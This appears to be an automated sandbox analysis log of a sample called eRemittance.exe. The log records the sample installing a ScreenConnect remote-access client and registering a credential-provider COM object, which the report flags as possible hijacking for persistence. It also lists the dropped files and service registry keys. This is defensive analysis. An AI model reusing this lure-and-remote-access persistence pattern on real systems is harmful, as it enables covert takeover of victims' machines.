Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: winsta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: samlib.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Window found: window name: SysTabControl32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Downloads\eRemittance.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Persistence and Installation Behavior

Possible COM Object hijacking

Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE23F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\Downloads\f49206ce-ea0b-4935-a632-940cd5b31daf.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\Downloads\Unconfirmed 376437.crdownload	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\MSIE23F.tmp

Jump to dropped file

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (484f9eed1d8e13b9)

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\eRemittance.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\eRemittance.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\eRemittance.exe	Process information set: NOOPENFILEERRORBOX
